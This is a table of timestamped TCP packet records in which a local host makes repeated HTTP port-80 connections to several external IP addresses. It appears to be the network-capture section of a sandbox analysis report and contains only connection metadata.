Jan 15, 2025 19:41:28.603169918 CET	64388	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:29.650341034 CET	64388	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:30.668679953 CET	64404	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:30.673609972 CET	80	64404	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:30.673695087 CET	64404	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:30.682738066 CET	64404	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:30.687549114 CET	80	64404	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:31.133748055 CET	80	64404	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:31.133886099 CET	80	64404	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:31.133991003 CET	64404	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:31.136708975 CET	64404	80	192.168.2.4	13.248.169.48
Jan 15, 2025 19:41:31.141498089 CET	80	64404	13.248.169.48	192.168.2.4
Jan 15, 2025 19:41:36.170321941 CET	64438	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:36.175820112 CET	80	64438	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:36.175913095 CET	64438	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:36.190784931 CET	64438	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:36.195684910 CET	80	64438	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:36.861893892 CET	80	64438	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:36.861953974 CET	80	64438	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:36.862020969 CET	64438	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:37.697285891 CET	64438	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:38.716327906 CET	64439	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:38.721179962 CET	80	64439	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:38.721254110 CET	64439	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:38.737420082 CET	64439	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:38.742250919 CET	80	64439	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:39.380317926 CET	80	64439	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:39.380364895 CET	80	64439	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:39.380475044 CET	64439	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:40.244137049 CET	64439	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:41.262927055 CET	64440	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:41.267832994 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.267975092 CET	64440	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:41.288460016 CET	64440	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:41.293756008 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.293768883 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.293787956 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.293796062 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.293804884 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.294125080 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.294161081 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.294212103 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.294219971 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.914681911 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.914729118 CET	80	64440	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:41.914818048 CET	64440	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:42.790996075 CET	64440	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:43.809741974 CET	64441	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:43.814687967 CET	80	64441	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:43.814816952 CET	64441	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:43.828107119 CET	64441	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:43.832983017 CET	80	64441	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:44.458853006 CET	80	64441	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:44.459006071 CET	80	64441	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:44.459079027 CET	64441	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:44.461538076 CET	64441	80	192.168.2.4	217.160.0.207
Jan 15, 2025 19:41:44.466372967 CET	80	64441	217.160.0.207	192.168.2.4
Jan 15, 2025 19:41:49.529012918 CET	64442	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:49.533922911 CET	80	64442	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:49.534079075 CET	64442	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:49.555042982 CET	64442	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:49.559897900 CET	80	64442	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:50.284336090 CET	80	64442	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:50.284360886 CET	80	64442	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:50.284415960 CET	80	64442	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:50.284439087 CET	64442	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:50.284461975 CET	64442	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:51.056652069 CET	64442	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:52.075862885 CET	64443	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:52.080698967 CET	80	64443	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:52.080825090 CET	64443	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:52.097152948 CET	64443	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:52.102715015 CET	80	64443	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:52.743319035 CET	80	64443	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:52.744700909 CET	80	64443	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:52.744770050 CET	64443	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:53.603503942 CET	64443	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:54.622323036 CET	64444	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:54.627125978 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.627285004 CET	64444	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:54.641722918 CET	64444	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:54.646641016 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646651030 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646686077 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646693945 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646729946 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646738052 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646783113 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646790981 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:54.646800995 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:55.289519072 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:55.289688110 CET	80	64444	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:55.289743900 CET	64444	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:56.150382042 CET	64444	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:57.168943882 CET	64445	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:57.174726963 CET	80	64445	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:57.174875975 CET	64445	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:57.184545040 CET	64445	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:57.189404964 CET	80	64445	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:57.826334953 CET	80	64445	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:57.829672098 CET	80	64445	136.243.64.147	192.168.2.4
Jan 15, 2025 19:41:57.829797029 CET	64445	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:57.830588102 CET	64445	80	192.168.2.4	136.243.64.147
Jan 15, 2025 19:41:57.835407019 CET	80	64445	136.243.64.147	192.168.2.4
Jan 15, 2025 19:42:03.345727921 CET	64446	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:03.350575924 CET	80	64446	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:03.350689888 CET	64446	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:03.412322998 CET	64446	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:03.417295933 CET	80	64446	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:03.953442097 CET	80	64446	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:03.953511000 CET	80	64446	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:03.953572989 CET	64446	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:04.916172981 CET	64446	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:05.935946941 CET	64447	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:05.941051006 CET	80	64447	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:05.941155910 CET	64447	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:05.958714962 CET	64447	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:05.963670969 CET	80	64447	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:06.530529976 CET	80	64447	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:06.530628920 CET	80	64447	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:06.530684948 CET	64447	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:07.462893009 CET	64447	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:08.481362104 CET	64448	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:08.486423016 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.486552954 CET	64448	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:08.507337093 CET	64448	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:08.512317896 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512331963 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512350082 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512357950 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512366056 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512474060 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512481928 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512521982 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:08.512538910 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:09.091219902 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:09.091341019 CET	80	64448	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:09.091406107 CET	64448	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:10.009757042 CET	64448	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:11.030778885 CET	64449	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:11.035976887 CET	80	64449	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:11.036201954 CET	64449	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:11.044707060 CET	64449	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:11.049581051 CET	80	64449	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:11.656708956 CET	80	64449	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:11.656747103 CET	80	64449	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:11.656959057 CET	64449	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:11.660955906 CET	64449	80	192.168.2.4	162.218.30.235
Jan 15, 2025 19:42:11.665782928 CET	80	64449	162.218.30.235	192.168.2.4
Jan 15, 2025 19:42:16.686117887 CET	64450	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:16.691087961 CET	80	64450	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:16.691190958 CET	64450	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:16.711601019 CET	64450	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:16.717149019 CET	80	64450	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:17.327960968 CET	80	64450	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:17.327986002 CET	80	64450	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:17.328073978 CET	64450	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:17.328838110 CET	80	64450	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:17.328900099 CET	64450	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:18.240638971 CET	64450	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:19.246890068 CET	64451	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:19.252074957 CET	80	64451	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:19.252182007 CET	64451	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:19.264206886 CET	64451	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:19.269049883 CET	80	64451	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:19.873476028 CET	80	64451	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:19.873493910 CET	80	64451	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:19.873608112 CET	64451	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:19.873693943 CET	80	64451	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:19.873784065 CET	64451	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:20.775696039 CET	64451	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:21.793688059 CET	64452	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:21.798959017 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.799065113 CET	64452	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:21.814934015 CET	64452	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:21.819813967 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.819880962 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.819910049 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.819957972 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.819983959 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.820175886 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.820204020 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.820235014 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:21.820261955 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:22.439168930 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:22.439230919 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:22.439290047 CET	64452	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:22.439914942 CET	80	64452	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:22.439977884 CET	64452	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:23.322308064 CET	64452	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.340837002 CET	64453	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.345866919 CET	80	64453	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:24.345958948 CET	64453	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.355755091 CET	64453	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.360760927 CET	80	64453	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:24.976391077 CET	80	64453	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:24.976416111 CET	80	64453	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:24.976584911 CET	64453	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.976638079 CET	80	64453	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:24.976747990 CET	64453	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.979177952 CET	64453	80	192.168.2.4	104.21.32.1
Jan 15, 2025 19:42:24.983993053 CET	80	64453	104.21.32.1	192.168.2.4
Jan 15, 2025 19:42:30.021476030 CET	64454	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:30.026328087 CET	80	64454	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:30.026397943 CET	64454	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:30.038793087 CET	64454	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:30.043620110 CET	80	64454	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:30.642826080 CET	80	64454	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:30.642859936 CET	80	64454	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:30.642920971 CET	64454	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:31.541297913 CET	64454	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:32.586244106 CET	64455	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:32.591177940 CET	80	64455	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:32.591294050 CET	64455	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:32.628897905 CET	64455	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:32.633866072 CET	80	64455	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:33.216074944 CET	80	64455	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:33.216160059 CET	80	64455	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:33.216253042 CET	64455	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:34.134866953 CET	64455	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:35.153522015 CET	64456	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:35.158508062 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.158606052 CET	64456	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:35.173688889 CET	64456	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:35.178663969 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178731918 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178761959 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178787947 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178814888 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178864956 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178893089 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178920031 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.178946018 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.798017025 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.798130989 CET	80	64456	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:35.798206091 CET	64456	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:36.681679010 CET	64456	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:37.699805021 CET	64457	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:37.705003023 CET	80	64457	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:37.705104113 CET	64457	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:37.712526083 CET	64457	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:37.717395067 CET	80	64457	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:38.298191071 CET	80	64457	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:38.298239946 CET	80	64457	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:38.298340082 CET	64457	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:38.300612926 CET	64457	80	192.168.2.4	162.0.236.169
Jan 15, 2025 19:42:38.305466890 CET	80	64457	162.0.236.169	192.168.2.4
Jan 15, 2025 19:42:43.355875015 CET	64458	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:43.360704899 CET	80	64458	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:43.360829115 CET	64458	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:43.380831957 CET	64458	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:43.385682106 CET	80	64458	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:44.020703077 CET	80	64458	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:44.020754099 CET	80	64458	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:44.020828962 CET	64458	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:44.020879030 CET	80	64458	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:44.020936012 CET	64458	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:44.885040045 CET	64458	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:45.903106928 CET	64459	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:45.908009052 CET	80	64459	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:45.908124924 CET	64459	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:45.919780970 CET	64459	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:45.924626112 CET	80	64459	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:46.558798075 CET	80	64459	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:46.558815956 CET	80	64459	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:46.558828115 CET	80	64459	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:46.558866978 CET	64459	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:46.558900118 CET	64459	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:47.431778908 CET	64459	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:48.449915886 CET	64460	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:48.454942942 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.455146074 CET	64460	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:48.468449116 CET	64460	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:48.473570108 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473602057 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473628998 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473673105 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473700047 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473752975 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473779917 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473805904 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:48.473831892 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:49.114911079 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:49.114970922 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:49.115025043 CET	64460	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:49.115042925 CET	80	64460	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:49.115097046 CET	64460	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:49.978579044 CET	64460	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:50.997999907 CET	64461	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:51.003027916 CET	80	64461	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:51.003266096 CET	64461	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:51.015913963 CET	64461	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:51.020749092 CET	80	64461	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:51.639360905 CET	80	64461	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:51.639435053 CET	80	64461	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:51.639476061 CET	80	64461	185.68.108.243	192.168.2.4
Jan 15, 2025 19:42:51.639585972 CET	64461	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:51.641877890 CET	64461	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:51.641877890 CET	64461	80	192.168.2.4	185.68.108.243
Jan 15, 2025 19:42:51.646786928 CET	80	64461	185.68.108.243	192.168.2.4
Jan 15, 2025 19:43:01.704498053 CET	64462	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:01.709388971 CET	80	64462	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:01.709495068 CET	64462	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:01.729919910 CET	64462	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:01.734993935 CET	80	64462	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:02.573676109 CET	80	64462	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:02.573728085 CET	80	64462	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:02.573791027 CET	64462	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:02.574143887 CET	80	64462	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:02.574201107 CET	64462	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:03.244594097 CET	64462	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:04.512415886 CET	64463	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:04.517524958 CET	80	64463	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:04.517631054 CET	64463	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:04.582050085 CET	64463	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:04.586926937 CET	80	64463	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:05.435673952 CET	80	64463	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:05.435709953 CET	80	64463	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:05.435795069 CET	64463	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:05.436048031 CET	80	64463	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:05.436120033 CET	64463	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:06.088260889 CET	64463	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:07.631253004 CET	64464	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:07.636290073 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.636548042 CET	64464	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:07.651979923 CET	64464	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:07.658822060 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.658915997 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.658943892 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.658972025 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.658998966 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.659049034 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.659075975 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.659101963 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:07.659152031 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:08.536554098 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:08.536673069 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:08.536807060 CET	64464	80	192.168.2.4	172.67.183.191
Jan 15, 2025 19:43:08.537244081 CET	80	64464	172.67.183.191	192.168.2.4
Jan 15, 2025 19:43:08.537339926 CET	64464	80	192.168.2.4	172.67.183.191
